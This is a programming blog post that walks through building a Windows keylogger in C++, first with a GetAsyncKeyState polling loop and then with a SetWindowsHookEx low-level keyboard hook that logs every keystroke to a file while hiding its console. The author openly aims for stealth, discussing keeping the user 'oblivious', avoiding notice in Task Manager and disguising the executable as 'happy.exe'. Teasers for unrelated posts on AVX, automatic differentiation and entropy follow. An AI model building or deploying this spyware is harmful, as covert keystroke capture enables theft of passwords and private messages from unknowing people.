Writing a keylogger application in Windows

-
This post is a little bit of a side-step. I was looking through the linux programming interface and set myself a task to obtain keyboard input using only unix commands. One problem: I only have access to a windows PC at the moment! While I could use a virtual machine, I thought it would be interesting to try and do the same thing in Windows using various methods.

The code for this post is on my git here.

The first method was to avoid using the Windows API as much as possible. The second was to use the SetWindowsHookEx method.

Method I

If you look at the code on my github, inside the main function we have something like this

while (1) {
    for (char i = 0; i < 127; i++) {
        if (GetAsyncKeyState(i) == -32767) {
            of << i;
            of.flush();
        }
    }
}

The only alien command is GetAsyncKeyState. This obtains the current state of the key. Using GetKeyState would be the wrong thing to do as we are not getting into processing messages on the message queue in this method(from SO):

 Every time you read a queued keyboard message, for example by calling GetMessage, the OS updates private keyboard state data associated with the calling thread. When you call GetKeyState that private keyboard state data is used to determine the returned key state. Thus, so long as you don't read another queued message, GetKeyState will always return the same value.

 This is great! right? Well, no. The first problem is the CPU usage when the program is executing:


100% of CPU cycles on a single thread are being used. If your goal is to have this code running silently on a system this does not achieve it! When the user takes a look at task manager and orders the tasks in terms of most hungry then this guy will be at the top (very likely, near the top at least)! Obviously you could call it "happy.exe", but still.

The problem is that pesky while loop, it just constantly burns cycles. If we had the terminal in view we could use getch() as follows 

while (1) {
    of << static_cast<char>(_getch());
    of.flush();
}

but we don't want the terminal in view! we need the user to be oblivious to the executable. However this does totally solve our burning thread problem. This is because getch() blocks! The kernel can then divert CPU resources from our running application to something else that needs it.

Method II

I will post (most of) the code first, then we will go through it.

LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (nCode == HC_ACTION) {
        switch (wParam)
        {
            case WM_KEYDOWN:
            case WM_SYSKEYDOWN:
            PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT)lParam;
            if ((wParam == WM_KEYDOWN) || (wParam == WM_SYSKEYDOWN)) {
                of << static_cast<char>(p->vkCode);
                of.flush();
            }
            break;
        }
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

int main()
{
    hideConsole();
    auto file_name = getFileName();
    of.open(file_name.c_str(), std::ofstream::out | std::ofstream::app);
    if (!of) {
        std::cerr << "can't open output file" << std::endl;
    }

    HHOOK hhkLowLevelKybd = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, 0, 0);
    MSG msg;

    while(!GetMessage(&msg, NULL, NULL, NULL)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    UnhookWindowsHookEx(hhkLowLevelKybd);
    return(0);
}

This solves all of our problems, here is the CPU usage during a run:

Them little spikes you see require me to smash 10+ keys down on the keyboard at once. We mentioned earlier that we did not want to deal with processing messages, now we do. The key to this solution is the function GetMessage, this blocks until there is a message in the windows message queue to process. We could have used PeekMessage, but that would have been very wrong indeed. PeekMessage returns irrespective of whether or not there are messages in the queue and so we have the spin cycle again.

So what happens to these messages when they are dispatched? They are picked up by our hook!

From MSDN:
A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

 DispatchMessage sends the message to the windows procedure (a hidden console window in this case) and is intercepted by our hook, which we set up with SetWindowsHookEx. As with all windows programming stuff, it looks a lot more complicated than it actually is. Googling the commands in our keyboard callback shows that. Obviously, we can make this application more sophisticated by showing backspaces etc. 

 logception - I am logging the writing of this blog!

DISCLAIMER! - I am not responsible for anything that you might do when you use this code. 

Comments

Post a Comment

Popular posts from this blog

Using the AVX instruction set to boost performance

-
Image
The AVX instruction set uses CPU registers to perform SIMD (Single Instruction Multiple Data) operations, which can be used to significantly speed up mathematical operations. I recently decided to create a digital filter in C++, and starting with the basics I came across a Finite Impulse Response (FIR) filter. Mathematically a FIR filter outputs a weighted sum of the most recent input values of the signal. The mathematics of a FIR filter are outlined  here . In practice, we typically work on sections of a signal. This is quite simply because we can not hold the entire signal in RAM. Consider the following signal which has been split into three chunks each of size 6,                                                        $$ [012123][123332][123342] $$ and the following filter $b = [1,2]$. In the routines discussed in this blog the a...
Read more

The magic behind deep learning : Obtaining gradients using reverse Automatic Differentiation.

-
Image
Every now and again a wave of rage washes over me when I hear someone (be it a news outlet, etc) refer to deep learning, and the like, as magic. Although, I must admit that I was a bit vague on how you can generate an error function given a network of nodes then minimise it without using numerical differentiation or providing the actual derivative (Although there are (totally) derivative-free minimisation methods such as Simplex etc.). The process of writing software for generating this error function (and a neural network) is not of my concern here, although it might be in a future blog post. What is of my concern is obtaining the gradient of this error function. Automatic Differentiation  First, lets discuss the process of obtaining the derivative of a expression that we already have the computation graph for . You will see that obtaining the computation graph is half the battle and many of the resources on the internet explaining Automatic Differentiation (AD) tend to brus...
Read more

Information Entropy

-
In the field of Information Theory, we can define the information conveyed $I(E)$ by the occurrence of an event $E$ as $$I(E) = \log \frac{1}{p(E)},$$ where $p(E)$ is the probability of the event $E$. Note that if the event is unlikely then the information gained is large. Suppose that we have an information source $X$, which can be thought of as a discrete random variable. $X$ can take on many "states" $\{x_i\}$. We can define the entropy of the system as $$H(X) = \sum_i^n  p(x_i)I(x_i),$$ where $n$ is the number of states that $X$ can take. An example of $X$ is an alphabet. A qualitative description of the entropy of an information source is a measure of its unpredictability. We can see this by observing the following: If the probabilities of the states of the source are uniform the entropy is maximised. That is, when we have no prior information about the likelihood of each state we expect the entropy of the information source to be large. We can prove this f...
Read more